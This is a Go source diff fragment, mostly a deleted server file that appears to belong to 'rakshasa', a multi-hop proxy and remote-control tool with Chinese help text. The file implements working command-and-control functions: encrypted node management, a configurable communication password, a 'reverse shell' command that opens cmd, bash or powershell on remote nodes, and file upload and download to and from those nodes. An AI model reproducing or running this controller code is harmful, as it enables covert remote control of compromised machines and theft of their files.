for _, _n := range nodeMap {
if _n.uuid != currentNode.uuid {
s = append(s, &nodeInfo{
UUID: _n.uuid,
HostName: cert.RSAEncrypterStr(_n.hostName),
MainIp: cert.RSAEncrypterStr(_n.mainIp),
Port: cert.RSAEncrypterStr(strconv.Itoa(_n.port)),
Goos: cert.RSAEncrypterStr(_n.goos),
})
}
}
b, _ := json.Marshal(s)
n.Write(common.CMD_GET_NODE_RESULT, id, b)
}
func (n *node) updateNode(msg nodeInfo) {
n.hostName = msg.HostName
-832
View File
@@ -1,832 +0,0 @@
package server
/*
*高级shell功能
*node节点管理、remoteShell远程shellconfig配置管理
*/
import (
"bytes"
"cert"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"os"
"os/exec"
"rakshasa/aes"
"rakshasa/common"
"github.com/google/uuid"
"regexp"
"runtime"
"strconv"
"strings"
"sync"
"sync/atomic"
"time"
"github.com/abiosoft/readline"
"github.com/creack/pty"
"github.com/luyu6056/ishell"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
)
var (
shellMapLock sync.Mutex
)
type StartCmdParam struct {
Param string
Size *pty.Winsize
}
type remoteCmd struct {
cmdStatus int32
cmd *exec.Cmd
id uint32
stdin io.WriteCloser
inChan chan []byte
translate func(in []byte) ([]byte, error)
ping, pong int64
}
func init() {
configShell := cliInit()
configShell.SetPrompt("rakshasa\\config>")
configShell.AddCmd(&ishell.Cmd{
Name: "info",
Help: "打印当前配置",
Func: func(c *ishell.Context) {
c.Println("当前节点", currentNode.uuid)
c.Println("上级节点地址", currentConfig.DstNode)
c.Println("通讯密码", currentConfig.Password)
c.Println("监听端口", currentConfig.Port)
c.Println("监听IP", currentConfig.ListenIp)
c.Println("禁止额外连接", currentConfig.Limit)
c.Println("配置文件名", currentConfig.FileName)
if currentConfig.FileSave {
c.Println("当前配置:已写入文件")
} else {
c.Println("当前配置:未写入文件")
}
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "save",
Help: "保存文件",
Func: func(c *ishell.Context) {
if err := ConfigSave(); err == nil {
c.Println("写入成功")
} else {
c.Println("保存失败", err.Error())
}
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "d",
Help: "修改上级节点地址,格式为 ip:端口 多个节点以,隔开 注意:不会立刻连接设置节点, 当发生 节点掉线重连 时候会连接该地址",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误,格式为 ip:端口 多个节点以,隔开 如 d 192.168.1.1:8883,192.168.1.2:8883")
return
}
dstNode, err := common.ResolveTCPAddr(c.Args[0])
if err != nil {
c.Println("参数错误,格式为 ip:端口 多个节点以,隔开 如 d 192.168.1.1:8883,192.168.1.2:8883")
return
}
currentConfig.DstNode = dstNode
currentConfig.FileSave = false
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "password",
Help: "修改通讯密码,立即生效",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误,格式为 password \"123456\"")
return
}
c.Println(c.Args)
currentConfig.Password = c.Args[0]
currentConfig.FileSave = false
aes.Key = aes.MD5_B(currentConfig.Password + string(cert.RsaPrivateKey[:16]))
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "port",
Help: "修改监听端口,立即生效",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误,格式为 port 8883")
return
}
port, _ := strconv.Atoi(c.Args[0])
if port <= 0 || port > 65535 {
c.Println("参数错误,端口范围是1-65535")
return
}
c.Println("正在关闭server监听")
if currentNode.listen != nil {
currentNode.listen.Close()
currentNode.listen = nil
}
currentConfig.Port = port
currentNode.port = port
currentConfig.FileSave = false
if err := StartServer(fmt.Sprintf(":%d", currentConfig.Port)); err != nil {
c.Printf("启动节点失败 %v, 请重新修改监听端口", currentConfig.Port)
}
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "ip",
Help: "修改本节点连接ip,当其他节点进行额外连接时候,优先使用此ip连接",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
currentConfig.ListenIp = c.Args[0]
currentNode.mainIp = currentConfig.ListenIp
currentConfig.FileSave = false
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "limit",
Help: "修改本节点Limit设置,使用方法 limit true",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
currentConfig.Limit = c.Args[0] == "true"
currentConfig.FileSave = false
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "f",
Help: "修改配置文件名,使用方法 f config.yaml",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
currentConfig.FileName = c.Args[0]
currentConfig.FileSave = false
},
})
configShell.AddCmd(&ishell.Cmd{
Name: "uuid",
Help: "修改本节点UUID设置,使用方法uuid 字串符",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
if id, err := uuid.Parse(c.Args[0]); err == nil {
currentConfig.UUID = id.String()
currentConfig.FileSave = false
SetConfig(currentConfig)
} else {
c.Println("输入的uuid不是合法的uuid,建议使用xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx")
}
},
})
rootCli.AddCmd(&ishell.Cmd{
Name: "config",
Help: "配置管理",
Func: func(c *ishell.Context) {
configShell.Run()
},
})
remoteShell := cliInit()
remoteShell.SetPrompt("rakshasa\\remoteshell>")
fileShell := cliInit()
remoteShell.AddCmd(&ishell.Cmd{
Name: "file",
Help: "连到节点进行文件管理,参数为id或者uuid",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
workN, _ := getNode(c.Args[0])
if workN == nil {
c.Println("无法连接节点", c.Args[0])
return
}
if workN != nil {
fileShell.Set("node", workN)
result := make(chan interface{}, 1)
id := workN.storeQuery(result)
workN.Write(common.CMD_PWD, id, []byte(cert.RSAEncrypterByPriv(currentConfig.Password)))
select {
case pwd := <-result:
workN.deleteQuery(id)
pwd = strings.ReplaceAll(pwd.(string), "\\", "/")
fileShell.Set("pwd", pwd)
fileShell.SetPrompt(workN.uuid + " " + pwd.(string) + ">")
fileShell.Run()
case <-time.After(common.CMD_TIMEOUT):
workN.deleteQuery(id)
c.Println("连接", c.Args[0], "超时")
}
}
},
})
fileShell.AddCmd(&ishell.Cmd{
Name: "dir",
Help: "打印当前目录文件",
Func: func(c *ishell.Context) {
pwd := fileShell.Get("pwd")
n := c.Get("node").(*node)
resChan := make(chan interface{}, 1)
id := n.storeQuery(resChan)
n.Write(common.CMD_DIR, id, []byte(cert.RSAEncrypterByPriv(pwd.(string))))
select {
case res := <-resChan:
n.deleteQuery(id)
c.Println(res)
case <-time.After(common.CMD_TIMEOUT):
n.deleteQuery(id)
c.Println("dir time out")
}
},
})
fileShell.AddCmd(&ishell.Cmd{
Name: "cd",
Help: "切换工作目录",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误")
return
}
dir := c.Args[0]
pwd := fileShell.Get("pwd").(string)
n := c.Get("node").(*node)
if strings.Contains(dir, ":/") || dir[0] == '/' || dir == "~" {
pwd = dir
} else {
pwd += "/" + dir
pwd = strings.TrimRight(getRealPath(pwd), "/")
}
resChan := make(chan interface{}, 1)
id := n.storeQuery(resChan)
n.Write(common.CMD_CD, id, []byte(cert.RSAEncrypterByPriv(pwd)))
select {
case res := <-resChan:
n.deleteQuery(id)
if err, ok := res.(error); ok {
c.Println(err.Error())
} else {
pwd = res.(string)
fileShell.Set("pwd", pwd)
c.SetPrompt(n.uuid + " " + pwd + ">")
}
case <-time.After(common.CMD_TIMEOUT):
n.deleteQuery(id)
c.Println("dir time out")
}
},
})
fileShell.AddCmd(&ishell.Cmd{
Name: "upload",
Help: "上传文件 ,upload 本地文件 远程目录(为空传到工作目录)",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 && len(c.Args) != 2 {
c.Println("参数错误")
return
}
s, err := os.Stat(c.Args[0])
if err != nil {
c.Println("打开本地文件", c.Args[0], "错误 ", err)
return
}
f, err := os.Open(c.Args[0])
if err != nil {
c.Println("打开本地文件", c.Args[0], "错误 ", err)
return
}
defer f.Close()
pwd := fileShell.Get("pwd").(string) + "/"
n := c.Get("node").(*node)
if len(c.Args) == 2 {
pwd = c.Args[1]
}
pwd = strings.ReplaceAll(pwd, "\\", "/")
c.Args[0] = strings.ReplaceAll(c.Args[0], "\\", "/")
i := strings.LastIndex(c.Args[0], "/")
if i == -1 {
i = 0
}
if pwd[len(pwd)-1] == '/' {
pwd += c.Args[0][i:]
}
i = strings.LastIndex(pwd, "/")
if i == -1 {
i = 0
}
filename := pwd[i+1:]
dir := pwd[:i]
dir = strings.TrimRight(getRealPath(dir), "/") + "/"
pwd = dir + filename
resChan := make(chan interface{}, 9999) //避免收消息阻塞
filereadChan := make(chan []byte, 10)
upload := func() {
for i := 0; i < 10; i++ {
buf := make([]byte, common.MAX_PACKAGE-len(pwd)-9)
n, err := f.Read(buf)
if err != nil {
if err == io.EOF {
return
}
resChan <- err
c.Println("读取文件", c.Args[0], "错误", err)
return
}
filereadChan <- buf[:n]
}
}
offset := 0
be := len(pwd) + 1
id := n.storeQuery(resChan)
defer n.deleteQuery(id)
b := []byte(pwd)
b = append(b, 0, 0, 0, 0, 0, 0, 0, 0, 0)
c.ProgressBar().Start()
go upload()
var resnum int
for {
select {
case data := <-filereadChan:
b[be] = byte(offset)
b[be+1] = byte(offset >> 8)
b[be+2] = byte(offset >> 16)
b[be+3] = byte(offset >> 24)
b[be+4] = byte(offset >> 32)
b[be+5] = byte(offset >> 40)
b[be+6] = byte(offset >> 48)
b[be+7] = byte(offset >> 56)
offset += len(data)
n.Write(common.CMD_UPLOAD, id, cert.RSAEncrypterByPrivByte(append(b, data...)))
case res := <-resChan:
switch v := res.(type) {
case error:
c.ProgressBar().Stop()
c.Println("上传失败", res)
return
case int64:
resnum++
i := v * 100 / s.Size()
c.ProgressBar().Suffix(fmt.Sprint(" ", i, "%"))
c.ProgressBar().Progress(int(i))
if v == s.Size() {
c.ProgressBar().Stop()
c.Println(c.Args[0], "上传成功")
return
}
if resnum >= 5 {
go upload()
resnum -= 10
}
default:
c.Println("协议错误")
return
}
case <-time.After(common.CMD_TIMEOUT):
c.ProgressBar().Stop()
c.Println("upload time out")
return
}
}
},
})
fileShell.AddCmd(&ishell.Cmd{
Name: "download",
Help: "下载文件 download 远程文件 本地目录(为空本地执行目录)",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 && len(c.Args) != 2 {
c.Println("参数错误")
return
}
pwd := fileShell.Get("pwd").(string)
n := c.Get("node").(*node)
file := c.Args[0]
file = strings.ReplaceAll(file, "\\", "/")
if strings.Contains(file, ":/") || file[0] == '/' {
pwd = file
} else {
pwd += "/" + file
}
i := strings.LastIndex(pwd, "/")
if i == -1 {
i = 0
}
filename := pwd[i+1:]
dir := pwd[:i]
dir = strings.TrimRight(getRealPath(dir), "/") + "/"
mydir, err := os.Getwd()
local := "./" + filename
if err == nil {
local = mydir + "/" + filename
}
if len(c.Args) == 2 {
s, err := os.Stat(c.Args[1])
if err == nil {
if s.IsDir() {
local = strings.TrimRight(c.Args[1], "/") + "/" + filename
} else {
local = c.Args[1]
}
} else {
local = c.Args[1]
}
}
pwd = dir + filename
result := make(chan interface{}, 999)
id := n.storeQuery(result)
defer n.deleteQuery(id)
b := []byte(pwd)
b = append(b, []byte{0, 0, 0, 0, 0, 0, 0, 0, 0}...)
total := int64(-1)
be := len(pwd) + 1
b[be] = byte(total)
b[be+1] = byte(total >> 8)
b[be+2] = byte(total >> 16)
b[be+3] = byte(total >> 24)
b[be+4] = byte(total >> 32)
b[be+5] = byte(total >> 40)
b[be+6] = byte(total >> 48)
b[be+7] = byte(total >> 56)
n.Write(common.CMD_DOWNLOAD, id, cert.RSAEncrypterByPrivByte(b))
c.ProgressBar().Start()
size := int64(0)
resnum := 0
total = 0
var f *os.File
for {
select {
case res := <-result:
switch v := res.(type) {
case error:
c.ProgressBar().Stop()
c.Println("下载失败", res)
return
case int64:
var err error
size = v
f, err = os.OpenFile(local, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, 0666)
if err != nil {
c.Println("本地文件 ", local, "写入失败", err.Error())
return
}
defer f.Close()
case []byte:
if f == nil {
c.Println("本地文件 ", local, "不可写入")
return
}
resnum++
num, err := f.Write(v)
if err != nil {
c.Println("本地文件 ", local, "写入失败", err.Error())
return
}
if num != len(v) {
c.Println("本地文件 ", local, "写入失败,写入量不符")
return
}
total += int64(num)
i := total * 100 / size
c.ProgressBar().Suffix(fmt.Sprint(" ", i, "%"))
c.ProgressBar().Progress(int(i))
if total == size {
c.ProgressBar().Stop()
c.Println(c.Args[0], "下载成功 文件保存到", local)
return
}
if resnum == 10 {
resnum -= 10
b[be] = byte(total)
b[be+1] = byte(total >> 8)
b[be+2] = byte(total >> 16)
b[be+3] = byte(total >> 24)
b[be+4] = byte(total >> 32)
b[be+5] = byte(total >> 40)
b[be+6] = byte(total >> 48)
b[be+7] = byte(total >> 56)
n.Write(common.CMD_DOWNLOAD, id, cert.RSAEncrypterByPrivByte(b))
}
default:
c.Println("协议错误")
return
}
case <-time.After(common.CMD_TIMEOUT):
c.ProgressBar().Stop()
c.Println("upload time out")
return
}
}
},
})
remoteShell.AddCmd(&ishell.Cmd{
Name: "new",
Help: "与一个或者多个节点连接,使用方法 new ip:端口 多个地址以,间隔 如1080 127.0.0.1:1081,127.0.0.1:1082",
Func: func(c *ishell.Context) {
if len(c.Args) != 1 {
c.Println("参数错误,使用方法 connect ip:端口")
return
}
for _, addr := range strings.Split(c.Args[0], ",") {
_, err := getNode(addr)
if err != nil {
c.Println("连接", addr, "失败", err)
return
}
}
},
})
remoteShell.AddCmd(&ishell.Cmd{
Name: "shell",
Help: "反弹shell 使用方法 shell id/uuid 启动参数 ,启动参数可为空,win默认启动cmd,linux默认启动bash 如 shell 1 powershell 。 shell 1 zsh",
Func: func(c *ishell.Context) {
if len(c.Args) < 1 {
c.Println("参数错误,例子 shell 1 powershell")
return
}
param := ""
if len(c.Args) == 2 {
param = c.Args[1]
}
n, _ := getNode(c.Args[0])
if n == nil {
c.Println("无法连接节点", c.Args[0])
return
}
res := make(chan interface{}, 999)
id := n.storeQuery(res)
defer n.deleteQuery(id)
p := StartCmdParam{
Param: param,
Size: common.GetSize(),
}
b, _ := json.Marshal(p)
n.Write(common.CMD_SHELL, id, cert.RSAEncrypterByPrivByte(b))
s := &remoteCmd{
cmd: nil,
stdin: nil,
inChan: make(chan []byte, 999),
translate: func(in []byte) ([]byte, error) { return in, nil },
pong: time.Now().Unix(),
}
select {
case i := <-res:
switch v := i.(type) {
case error:
c.Println("启动shell失败,错误", v.Error())
case []byte:
data := v
s.id = uint32(data[0]) | uint32(data[1])<<8 | uint32(data[2])<<16 | uint32(data[3])<<24
switch data[4] {
case 0: //windows
if string(data[len(data)-6:]) == string([]byte{32, 57, 51, 54, 13, 10}) { //活动代码页: 936
//gbk转utf8
s.translate = func(in []byte) ([]byte, error) {
reader := transform.NewReader(bytes.NewReader(in), simplifiedchinese.GBK.NewDecoder())
d, e := ioutil.ReadAll(reader)
if e != nil {
return nil, e
}
return d, nil
}
}
case 1: //linux
if runtime.GOOS == "windows" {
if !common.EnableTermVt {
s.translate = func(in []byte) ([]byte, error) {
if in[0] == 27 {
r, _ := regexp.Compile(`\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])`)
res := r.ReplaceAllString(string(in), "")
return []byte(res), nil
}
return in, nil
}
}
}
}
atomic.CompareAndSwapInt32(&s.cmdStatus, 0, 1)
}
case <-time.After(common.CMD_TIMEOUT):
c.Println("启动shell失败,超时")
return
}
n.shellMap.Store(s.id, s)
r, _ := readline.NewEx(&readline.Config{FuncIsTerminal: func() bool { return false }, ForcePrint: true})
defer func() {
n.shellMap.Delete(s.id)
atomic.StoreInt32(&s.cmdStatus, -1)
c.Println("请按回车键退出")
r.Close()
}()
go func() {
for {
switch s.cmdStatus {
case 1:
input, err := r.ReadlineEx()
if err != nil {
if err != readline.ErrInterrupt {
res <- err
return
}
if s.cmdStatus == 1 {
n.Write(common.CMD_SHELL_DATA, s.id, []byte{03})
}
}
if s.cmdStatus == 1 {
n.Write(common.CMD_SHELL_DATA, s.id, []byte(input+"\n"))
}
case 0:
time.Sleep(time.Millisecond * 100)
case -1:
return
}
}
}()
tick := time.NewTicker(common.CMD_TIMEOUT / 2)
for {
select {
case b := <-s.inChan:
s.pong = time.Now().Unix()
if len(b) > 0 {
b, err := s.translate(b)
if err != nil {
c.Println("shell 运行失败", err)
return
}
fmt.Print(string(b))
}
case v := <-res:
if err, ok := v.(error); ok {
if err.Error() != "退出shell" {
c.Println("运行shell", param, "失败", err)
}
} else {
c.Println("无法处理消息", v)
}
return
case <-tick.C:
s.ping = time.Now().Unix()
if s.ping-s.pong > int64(common.CMD_TIMEOUT/time.Second) {
c.Println("shell time out")
return
}
n.Write(common.CMD_SHELL_DATA, s.id, nil)
}
}
},
})
rootCli.AddCmd(&ishell.Cmd{
Name: "remoteshell",
Help: "远程shell",
Func: func(c *ishell.Context) {
remoteShell.Run()
},
})
}
// 打印节点
func printNodes(c *ishell.Context) {
l := clientLock.RLock()
defer l.RUnlock()
var list []*node
for _, n := range nodeMap {
list = append(list, n)
}
orderNode(list)
c.Println("ID UUID HostName GOOS IP listenIP")
c.Println("-----------------------------------------------------------------------------------------------------------------------------")
for k, n := range list {
n.id = k + 1
hostname := bytes.Repeat([]byte(" "), 22)
copy(hostname, n.hostName)
ip := bytes.Repeat([]byte(" "), 23)
if n.uuid == currentNode.uuid {
copy(ip, "(localhost)"+":"+strconv.Itoa(n.port))
} else {
copy(ip, n.addr+":"+strconv.Itoa(n.port))
}
listenip := n.mainIp
goos := bytes.Repeat([]byte(" "), 11)
copy(goos, n.goos)
c.Printf("%2d %s %s %s %s %s\n", n.id, n.uuid, hostname, goos, ip, listenip)
}
}
func getRealPath(path string) string {
path_s := strings.Split(path, "/")
realpath := []string{}
if len(path_s) == 0 {
return "error"
}
for _, value := range path_s {
if value == ".." {
k := len(realpath)
kk := k - 1
realpath = append(realpath[:kk], realpath[k:]...)
} else {
realpath = append(realpath, value)
}
}
return strings.Join(realpath, "/")
}
func printConn() {
connMap.Range(func(key, value interface{}) bool {
fmt.Println(key)
return true
})
}
func getNode(arg string) (*node, error) {
l := clientLock.Lock()
defer l.Unlock()
id, err := strconv.Atoi(arg)
if err == nil {
for _, n := range nodeMap {
if n.id == id {
return n, nil
}
}
} else {
for _, node := range nodeMap {
if fmt.Sprintf("%s:%d", node.mainIp, node.port) == arg {
return node, nil
} else if fmt.Sprintf("%s:%d", node.addr, node.port) == arg {
return node, nil
} else if node.uuid == arg {
return node, nil
}
}
}
return connectNew(arg)
}